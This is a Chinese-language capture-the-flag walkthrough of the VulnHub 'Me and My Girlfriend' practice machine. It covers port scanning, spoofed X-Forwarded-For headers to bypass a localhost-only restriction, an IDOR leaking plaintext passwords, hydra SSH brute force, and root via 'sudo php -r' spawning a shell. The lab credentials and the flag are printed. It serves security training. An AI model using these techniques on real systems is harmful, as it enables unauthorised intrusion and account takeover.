8.me and my girlfriend

me and my girlfriend

一个不错的练手靶机

https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/

靶机 : me and my girlfriend

渗透机 : kali + win10

补充 : 如果靶机自带的是nat网络 , 如果需要更改 , 别忘记啦 , 我忘记是什么啦

目标: 拿到flag1.txt flag2.txt

0x01. 信息收集

1. 确定靶机ip

扫描当前网段ip

image-20210701204939878

kali 192.168.0.105 靶机 192.168.0.110

2. 扫描全端口

rustscan -a 192.168.0.110 -r 1-65535 -- -sV
这里用的是rustscan扫描的 , 当然你也可以用nmap

image-20210701205059221

既然开放了 22 80 , 那么访问一下80端口 , 发现只允许本地访问 , 那么我们就简单的绕一下

image-20210701205227122

X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
不知道是哪个头获取的ip , 索性全加上吧

image-20210701205559934

这样就有权限访问了 , 接下来就是简单的注册一个登录试一试

image-20210701205833309

0x02. 漏洞探测

1. 漏洞验证

通过你多年的渗透经验 , 发现了一个uid参数 , 很有可能存在越权漏洞 , fuzz一下试试

image-20210701205948785

细节 , 0-12

image-20210701210034343

果然存在越权漏洞 , 获取到存在的账号和密码

user
alice                         
sundatea                 
aingmaung             
abdikasepak           
eweuhtandingan     
sedihaingmah 

passwd
4lic3
indONEsia
qwerty!!!
dorrrrr
skuyatuh
cedihhihihi

之前扫描出来一个22端口 , 尝试用这些账号和密码爆破一下

hydra -L ./user.txt -P ./passwd.txt -vV -f 192.168.0.110 ssh

最后爆出账密

alice       4lic3

然后就是ssh登录

2. 拿到shell

ssh alice@192.168.0.110

image-20210701210446622

然后通过查看家目录的隐藏文件 , 找到一个我的秘密文件夹

image-20210701210600811

根据提示 , 接下来就是提权进到root下找到最后的flag啦

0x03. 提权

1. 主机信息收集

提权的本质也就是根据主机的漏洞 , 进行权限提升 , 所以还是要信息收集的

GitHub - rebootuser/LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks

或者用这个提权辅助工具
https://github.com/mzet-/linux-exploit-suggester.git
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh

上传Linux信息收集脚本发现一个sudoers提权方法 , 但是靶机无法调用gcc编译 , 所以看看有没有其他方法

2. php提权

sudo -l

https://gtfobins.github.io/gtfobins/php/#suid

sudo php -r "system('/bin/bash');"

image-20210701211040208

顺利拿到第二个flag

Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}
原文地址:https://www.cnblogs.com/xcymn/p/15712504.html